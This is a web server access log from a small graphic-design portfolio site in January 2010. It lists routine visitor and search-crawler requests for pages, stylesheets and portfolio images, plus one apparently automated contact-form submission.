76.74.206.143 - - [20/Jan/2010:18:37:31 -0500] "GET /index.css HTTP/1.1" 200 962 "http://alex.jeb.ca/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:31 -0500] "GET /top_nav.css HTTP/1.1" 200 841 "http://alex.jeb.ca/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:32 -0500] "GET /images/on_left.gif HTTP/1.1" 200 478 "http://alex.jeb.ca/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:32 -0500] "GET /images/right.gif HTTP/1.1" 200 1986 "http://alex.jeb.ca/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:32 -0500] "GET /images/bg.gif HTTP/1.1" 200 519 "http://alex.jeb.ca/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:32 -0500] "GET /images/left.gif HTTP/1.1" 200 493 "http://alex.jeb.ca/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:32 -0500] "GET /images/on_right.gif HTTP/1.1" 200 1971 "http://alex.jeb.ca/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:47 -0500] "GET /pages.html HTTP/1.1" 200 4692 "http://alex.jeb.ca/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:47 -0500] "GET /images/_portfolio/web_pages/golf_quiz.gif HTTP/1.1" 200 1517 "http://alex.jeb.ca/pages.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:47 -0500] "GET /images/_portfolio/web_pages/html.gif HTTP/1.1" 200 1774 "http://alex.jeb.ca/pages.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:47 -0500] "GET /images/_portfolio/web_pages/sellance.gif HTTP/1.1" 200 1522 "http://alex.jeb.ca/pages.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:47 -0500] "GET /images/_portfolio/web_pages/raris.gif HTTP/1.1" 200 2216 "http://alex.jeb.ca/pages.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:47 -0500] "GET /images/_portfolio/web_pages/havlat_photography.gif HTTP/1.1" 200 1001 "http://alex.jeb.ca/pages.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:47 -0500] "GET /images/_portfolio/web_pages/email.gif HTTP/1.1" 200 1686 "http://alex.jeb.ca/pages.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:37:47 -0500] "GET /images/_portfolio/web_pages/impressions.gif HTTP/1.1" 200 1095 "http://alex.jeb.ca/pages.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:38:57 -0500] "GET /illustrator.html HTTP/1.1" 200 6612 "http://alex.jeb.ca/pages.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:38:57 -0500] "GET /images/_portfolio/illustrator/wine_label_sm.gif HTTP/1.1" 200 1240 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:38:57 -0500] "GET /images/_portfolio/illustrator/02_graph_sm.gif HTTP/1.1" 200 1405 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:38:58 -0500] "GET /images/_portfolio/illustrator/01_graph_sm.gif HTTP/1.1" 200 2115 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:38:58 -0500] "GET /images/_portfolio/illustrator/castle_drawing_sm.gif HTTP/1.1" 200 748 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:38:58 -0500] "GET /images/_portfolio/illustrator/venus_butterfly_flyer_sm.gif HTTP/1.1" 200 856 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:38:58 -0500] "GET /images/_portfolio/illustrator/maple_leaf_sm.gif HTTP/1.1" 200 897 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:38:58 -0500] "GET /images/_portfolio/illustrator/pineapples_sm.gif HTTP/1.1" 200 1972 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:38:58 -0500] "GET /images/_portfolio/illustrator/vine_alphabet_sm.gif HTTP/1.1" 200 642 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:38:58 -0500] "GET /images/_portfolio/illustrator/women_flowers_sm.gif HTTP/1.1" 200 2504 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:38:58 -0500] "GET /images/_portfolio/illustrator/fleur_de_lis_sm.gif HTTP/1.1" 200 960 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
76.74.206.143 - - [20/Jan/2010:18:39:02 -0500] "GET /images/_portfolio/illustrator/maple_leaf.gif HTTP/1.1" 200 15825 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
65.55.106.208 - - [21/Jan/2010:06:18:14 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.208 - - [21/Jan/2010:06:19:07 -0500] "GET /email/origins.html HTTP/1.1" 404 277 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.130 - - [22/Jan/2010:04:19:27 -0500] "GET /robots.txt HTTP/1.0" 404 269 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
188.92.75.14 - - [22/Jan/2010:16:18:50 -0500] "GET /pages.html HTTP/1.1" 200 4692 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:18:52 -0500] "GET /index.html HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:18:54 -0500] "GET /illustrator.html HTTP/1.1" 200 6612 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:18:57 -0500] "GET /flash.html HTTP/1.1" 200 4756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:18:59 -0500] "GET /photoshop.html HTTP/1.1" 200 7709 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:19:02 -0500] "GET /print.html HTTP/1.1" 200 4324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:19:04 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:19:07 -0500] "POST /formmail.php HTTP/1.1" 200 355 "http://alex.jeb.ca/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:19:09 -0500] "GET /formmail.php HTTP/1.1" 200 319 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:19:11 -0500] "GET /pages.html HTTP/1.1" 200 4692 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:19:13 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:19:16 -0500] "GET / HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:19:17 -0500] "GET /index.html HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:19:19 -0500] "GET /illustrator.html HTTP/1.1" 200 6612 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:19:22 -0500] "GET /flash.html HTTP/1.1" 200 4756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:19:24 -0500] "GET /photoshop.html HTTP/1.1" 200 7709 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.92.75.14 - - [22/Jan/2010:16:19:27 -0500] "GET /print.html HTTP/1.1" 200 4324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.55.207.135 - - [22/Jan/2010:17:47:37 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.135 - - [22/Jan/2010:17:48:30 -0500] "GET /email/origins.html HTTP/1.1" 404 277 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.68.242 - - [22/Jan/2010:21:48:36 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "Googlebot-Image/1.0"
66.249.68.242 - - [22/Jan/2010:21:48:36 -0500] "GET /images/_portfolio/web_pages/html.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
67.218.116.130 - - [23/Jan/2010:01:58:11 -0500] "GET /robots.txt HTTP/1.0" 404 269 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
95.108.128.241 - - [23/Jan/2010:15:09:29 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "Yandex/1.01.001 (compatible; Win16; I)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /flash.html HTTP/1.1" 200 4756 "http://images.google.com/imgres?imgurl=http://alex.jeb.ca/images/_portfolio/flash/annimated_butterfly.gif&imgrefurl=http://alex.jeb.ca/flash.html&usg=__tNaqVupFHVpi2fP0IaPPNBcTjVM=&h=75&w=75&sz=1&hl=en&start=159&itbs=1&tbnid=q9i2dvIuXdOzUM:&tbnh=71&tbnw=71&prev=/images%3Fq%3Danimated%2Bbutterfly%2Bgif%26gbv%3D2%26ndsp%3D21%26hl%3Den%26sa%3DN%26start%3D147" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /index.css HTTP/1.1" 200 962 "http://alex.jeb.ca/flash.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /top_nav.css HTTP/1.1" 200 841 "http://alex.jeb.ca/flash.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /images/_portfolio/flash/annimated_butterfly.gif HTTP/1.1" 200 514 "http://alex.jeb.ca/flash.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /main.js HTTP/1.1" 200 5103 "http://alex.jeb.ca/flash.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /images/_portfolio/flash/venus.gif HTTP/1.1" 200 1148 "http://alex.jeb.ca/flash.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /images/_portfolio/flash/rotating_circles.gif HTTP/1.1" 200 1022 "http://alex.jeb.ca/flash.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /images/_portfolio/flash/venn_diagram.gif HTTP/1.1" 200 884 "http://alex.jeb.ca/flash.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /images/_portfolio/flash/wine_banner.gif HTTP/1.1" 200 1021 "http://alex.jeb.ca/flash.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /images/_portfolio/flash/bending_arrow.gif HTTP/1.1" 200 428 "http://alex.jeb.ca/flash.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /images/_portfolio/flash/finland.gif HTTP/1.1" 200 669 "http://alex.jeb.ca/flash.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /images/bg.gif HTTP/1.1" 200 519 "http://alex.jeb.ca/top_nav.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /images/left.gif HTTP/1.1" 200 493 "http://alex.jeb.ca/top_nav.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /images/right.gif HTTP/1.1" 200 1986 "http://alex.jeb.ca/top_nav.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /images/on_left.gif HTTP/1.1" 200 478 "http://alex.jeb.ca/top_nav.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:07 -0500] "GET /images/on_right.gif HTTP/1.1" 200 1971 "http://alex.jeb.ca/top_nav.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:19 -0500] "GET /favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
98.140.22.47 - - [23/Jan/2010:15:48:19 -0500] "GET /images/_portfolio/flash/butterfly_animation.swf HTTP/1.1" 200 8644 "http://alex.jeb.ca/flash.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
95.108.128.241 - - [24/Jan/2010:00:38:38 -0500] "GET / HTTP/1.1" 200 1984 "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.68.242 - - [24/Jan/2010:07:04:05 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "Googlebot-Image/1.0"
66.249.68.242 - - [24/Jan/2010:07:04:05 -0500] "GET /images/_portfolio/flash/annimated_butterfly.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
95.108.128.241 - - [24/Jan/2010:08:25:06 -0500] "GET /email/origins.html HTTP/1.1" 404 277 "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.130 - - [24/Jan/2010:08:32:12 -0500] "GET /robots.txt HTTP/1.0" 404 269 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
95.108.128.241 - - [24/Jan/2010:20:00:07 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "Yandex/1.01.001 (compatible; Win16; I)"
152.10.177.210 - - [24/Jan/2010:22:42:06 -0500] "GET /illustrator.html HTTP/1.1" 200 6612 "http://images.google.com/imgres?imgurl=http://alex.jeb.ca/images/_portfolio/illustrator/fleur_de_lis_sm.gif&imgrefurl=http://alex.jeb.ca/illustrator.html&usg=__xDWGxtTS7gppBPaxc8_Y7A8gfbo=&h=75&w=75&sz=1&hl=en&start=512&um=1&tbnid=Jt8-48SFFtjLYM:&tbnh=71&tbnw=71&prev=/images%3Fq%3Dfleur%2Bde%2Blis%2B3d%26ndsp%3D18%26hl%3Den%26rlz%3D1C1DVCB_enUS354US355%26sa%3DN%26start%3D504%26um%3D1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /index.css HTTP/1.1" 200 962 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /top_nav.css HTTP/1.1" 200 841 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /main.js HTTP/1.1" 200 5103 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/bg.gif HTTP/1.1" 200 519 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/left.gif HTTP/1.1" 200 493 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/right.gif HTTP/1.1" 200 1986 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/on_right.gif HTTP/1.1" 200 1971 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/on_left.gif HTTP/1.1" 200 478 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/_portfolio/illustrator/wine_label_sm.gif HTTP/1.1" 200 1240 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/_portfolio/illustrator/01_graph_sm.gif HTTP/1.1" 200 2115 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/_portfolio/illustrator/02_graph_sm.gif HTTP/1.1" 200 1405 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/_portfolio/illustrator/venus_butterfly_flyer_sm.gif HTTP/1.1" 200 856 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/_portfolio/illustrator/fleur_de_lis_sm.gif HTTP/1.1" 200 960 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/_portfolio/illustrator/maple_leaf_sm.gif HTTP/1.1" 200 897 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/_portfolio/illustrator/vine_alphabet_sm.gif HTTP/1.1" 200 642 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/_portfolio/illustrator/pineapples_sm.gif HTTP/1.1" 200 1972 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/_portfolio/illustrator/castle_drawing_sm.gif HTTP/1.1" 200 748 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:07 -0500] "GET /images/_portfolio/illustrator/women_flowers_sm.gif HTTP/1.1" 200 2504 "http://alex.jeb.ca/illustrator.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
152.10.177.210 - - [24/Jan/2010:22:42:08 -0500] "GET /favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"
89.248.172.58 - - [25/Jan/2010:07:35:32 -0500] "GET /pages.html HTTP/1.1" 200 4692 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:32 -0500] "GET /index.html HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:32 -0500] "GET /illustrator.html HTTP/1.1" 200 6612 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:33 -0500] "GET /flash.html HTTP/1.1" 200 4756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:33 -0500] "GET /photoshop.html HTTP/1.1" 200 7709 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:33 -0500] "GET /print.html HTTP/1.1" 200 4324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
